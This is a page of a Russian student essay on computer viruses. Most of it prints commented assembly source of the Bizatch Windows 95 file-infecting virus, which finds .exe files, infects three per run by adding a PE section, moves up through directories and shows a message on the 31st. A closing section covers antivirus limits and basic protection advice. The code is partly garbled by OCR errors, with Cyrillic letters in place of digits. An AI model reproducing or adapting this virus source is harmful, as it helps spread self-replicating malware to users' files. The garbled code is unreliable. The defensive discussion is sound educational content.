Реферат: Компьютерные вирусы
push dword ptr [ebp+offset ahand]
call WriteFile
;3акроем файл
notape:
push dword ptr [ebp+offset ahand]
call CloseFile
; Переход к следующему файлу
findnextone:
;Проверим, сколько файлов заразили: если 3,
;то выходим, если меньше - ищем следующий
cmp byte ptr [ebp+offset countinfect],3
jz outty
;Ищем следующий файл
lea eax, [ebp+offset win32_data_thang]
push eax
push dword ptr [ebp+offset searchhandle]
call FindNext
;Если файл найден, переходим к заражению
or eax, eax
jnz gofile
;Сюда попадаем, если файл не найден
foundnothing:
;Сменим директорию
хоr eax, eax
lea edi, [ebp+offset tempdir]
mov ecx, 256/4
rep stosd
lea edi, [ebp+offset tempdirl]
mov ecx,256/4
rep stosd
;Получим текущую директорию
lea esi,[ebp+offset tempdir]
push esi
push 255
call GetCurDir
;Сменим директорию на "."
lea eax, [ebp+offset dotdot]
push eax
call SetCurDir
;Получим текущую директорию
lea edi,[ebp+offset tempdirl]
push edi
push 255
call GetCurDir
;Проверим, корневая ли это директория. Если да, то выходим
mov ecx, 256/4
rep cmpsd
jnz infectdir
;"3аметаем следы" и выходим в программу-носитель
outty:
;Возвратимся в оригинальную текущую директорию
lea eax,[ebp+offset orgdir]
push eax
call SetCurDir
;Получим текущую дату и время
lea eax, [ebp+offset systimestruct]
push eax
call GetTime
;Проверим число. Если это 31-ое, выдаем сообщение
cmp word ptr [ebp+offset day],31
jnz nopayload
;Сообщение для пользователя
push 1000h ;MB_SYSTEMMODAL
lea eax, [ebp+offset boxtitle]
push eax
lea eax, [ebp+offset boxmsg]
push eax
push 0
call MsgBox
;Выход в программу-носитель
nopayload:
pop eax
jmp eax
;Когда KERNEL будет обнаружен, его смещение будет записано
kern dd OBFF93B95h
;Значения KERNEL, известные нам
kern1 dd OBFF93B95h
kern2 dd OBFF93C1Dh
;Чтение текущей директории
GetCurDir:
;3апишем в стек значение для получения текущей
директории и вызовем KERNEL
push OBFF77744h
jmp [ebp+offset kern]
;Установка текущей директории
SetCurDir:
;3апишем в стек значение для установки текущей
директории и вызовем KERNEL
push OBFF7771Dh
jmp [ebp+offset kern]
;Получение времени и даты
GetTime:
;Проверим, какой KERNEL работает
cmp [ebp+offset kern],OBFF93B95h
jnz gettimekern2
;3апишем в стек значение для получения
;времени и даты и вызовем KERNEL
push OBFF9DOB6h
jmp [ebp+offset kern]
gettimekern2:
;Запишем в стек значение для получения
;Времени и даты и вызовем KERNEL
push OBFF9Dl4Eh
jmp [ebp+offset kern]
;Вывод сообщения
MsgBox:
;Запишем в стек значение для вывода сообщения и вызовем KERNEL
push OBFF638D9h
jmp [ebp+offset kern]
;Поиск первого файла
FindFile:
;Запишем в стек значение для поиска первого файла
;и вызовем KERNEL
push OBFF77893h
jmp [ebp+offset kern]
;Поиск следующего файла
FindNext:
;Запишем в стек значение для поиска
;следующего файла и вызовем KERNEL
push OBFF778CBh
jmp [ebp+offset kern]
;Открытие/создание файла
CreateFile:
;3апишем в стек значение для открытия/создания файла
;и вызовем KERNEL
push OBFF77817h
jmp [ebp+offset kern]
;Установка указателя чтения/записи
SetFilePointer:
;Запишем в стек значение для установки
;указателя чтения/записи файла и вызовем KERNEL
push OBFF76FAOh
jmp [ebp+offset kern]
;Чтение из файла
ReadFile:
;3апишем в стек значение для чтения из файла и вызовем KERNEL
push OBFF75806h
jmp [ebp+offset kern]
;3апись в файл
WriteFile:
;3апишем в стек значение для записи в файл и вызовем KERNEL
push OBFF7580Dh
jmp [ebp+offset kern]
;Закрытие файла
CloseFile:
;3апишем в стек значение для закрытия файла и вызовем KERNEL
push OBFF7BC72h
jmp [ebp+offset kern]
;Счетчик заражений
countinfect db 0
;Используется для поиска файлов
win32_data_thang:
fileattr dd 0
createtime dd 0,0
lastaccesstime dd 0,0
lastwritetime dd 0,0
filesize dd 0,0
resv dd 0,0
fullname db 256 dup (0)
realname db 256 dup (0)
;Имя сообщения, выводимого 31-го числа
boxtitle db "Bizatch by Quantum / VLAD",0
;Сообщение, .выводимое 31-го числа
boxmsg db "The taste of fame just got tastier!",0dh
db "VLAD. Australia does it again with the world"s first Win95 Virus"
db Odh.Odh
db 9,"From the old school to the new. ",0dh,0dh
db 9,"Metabolis",0dh
db 9,"Qark",0dh
db 9,"Darkman",0dh
db 9,"Quantum",0dh
db 9,"CoKe",0
messagetostupidavers db "Please note: the name of this virus is [Bizatch]"
db "written by Quantum of VLAD",0
;Данные о директориях
orgdir db 256 dup (0)
tempdir db 256 dup (0)
tempdirl db 256 dup (0)
Используется для смены директории
dotdot db ".",0
;Используется для получения времени/даты
systimestruct:
dw 0,0,0
day dw 0
dw 0,0,0,0
;Индекс для поиска файлов
searchhandle dd О
;Маска для поиска
fname db "*.exe",0
;Описатель открытого файла
ahand dd О
;Смещение РЕ-заголовка в файле
peheaderoffset dd О
;Смещение таблицы объектов
ObjedlTableoffset dd О
;Количество записанных/считанных байт при работе с файлом
bytesread dd О
;Новый объект
newobject:
oname db ".vlad",0,0,0
virtualsize dd 0
RVA dd 0
physicalsize dd 0
physicaloffset dd 0
reserved dd 0,0,0
objectflags db 40h,0,0,OCOh
;Данные, необходимые для заражения файла
peheader:
signature dd 0
cputype dw 0
numObj dw 0
db 3*4 dup (0)
NtHeaderSize dw 0
Flags dw 0
db 4*4 dup (0)
entrypointRVA dd 0
db 3*4 dup (0)
objalign dd 0
filealign dd 0
db 4*4 dup (0)
imagesize dd 0
headersize dd 0
;0бласть памяти для чтения остатка РЕ-заголовка и таблицы объектов
vend:
db 1000h dup (0)
ends
end vstart
Методы борьбы с вирусами.
Рассмотрим различные способы борьбы с вирусами. Итак, что же такое антивирус? Сразу же развеем одну часто возникающую иллюзию. Почему-то многие считают, что антивирус может обнаружить любой вирус, то есть, запустив антивирусную программу или монитор, можно быть абсолютно уверенным в их надежности. Такая точка зрения не совсем верна. Дело в том, что антивирус - это тоже программа, конечно, написанная профессионалом. Но эти программы способны распознавать и уничтожать только известные вирусы. То есть антивирус против конкретного вируса может быть написан только в том случае, когда у программиста есть в наличии хотя бы один экземпляр этого вируса. Вот и идет эта бесконечная война между авторами вирусов и антивирусов, правда, первых в нашей стране почему-то всегда больше, чем вторых. Но и у создателей антивирусов есть преимущество! Дело в том, что существует большое количество вирусов, алгоритм которых практически скопирован с алгоритма других вирусов. Как правило, такие вариации создают непрофессиональные программисты, которые по каким-то причи-нам решили написать вирус. Для борьбы с такими «копиями» придумано новое оружие - эвристические анализаторы. С их помощью антивирус способен находить подобные аналоги известных вирусов, сообщая пользователю, что у него, похоже, завелся вирус. Естественно, надежность эвристического анализатора не 100%, но все же его коэффициент полезного действия больше 0,5. Таким образом, в этой информационной войне, как, впрочем, и в любой другой, остаются сильнейшие. Вирусы, которые не распознаются антивирусными детекторами, способны написать только наиболее опытные и квалифицированные программисты.
Таким образом, на 100% защититься от вирусов практически невозможно (подразумевается, что пользователь меняется дискетами с друзьямии играет в игры, а также получает информацию из других источников,например из сетей). Если же не вносить информацию в компьютер из-вне, заразиться вирусом невозможно - сам он не родится. Итак, что же можно посоветовать, чтобы сталкиваться с вирусами какможно меньше или, по крайней мере, только сталкиваться, не допускаяих на жесткий диск своего винчестера. В первую очередь - самые элементарные правила «компьютерной гигиены»: проверка дискет на наличие вируса самыми надежными антивирусными программами, такими, например, как AVP или DrWeb. Очень хорошо, если на жестком диске установлен ревизор Adinf. Многие пользователи добавляют строку запуска ревизоров, антивирусов, антивирусных мониторов в конфигура-ционный файл AUTOEXEC.BAT - тоже весьма действенно.
Есть определенные способы борьбы и с загрузочными вирусами. В установках (SETUP) компьютера предусмотрена защита от записи в MBR. Когда запись начинается, BIOS сразу же ее останавливает и запрашивает подтверждение на разрешение записи. Естественно, следует запретить запись, а затем загрузится со своей, заранее подготовленной, системной дискеты. У большинства компьютерных пользователей такой дискеты нет - а надо бы завести. И это еще не все. Вирусы постоянно совершенствуются, и все их многообразие охватить, конечно, невозможно. Поэтому надо быть готовым, что рано или поздно вирус все-таки попадет на жесткий диск, и встретить его нужно во всеоружии.
Страницы: 1, 2, 3, 4, 5, 6, 7, 8
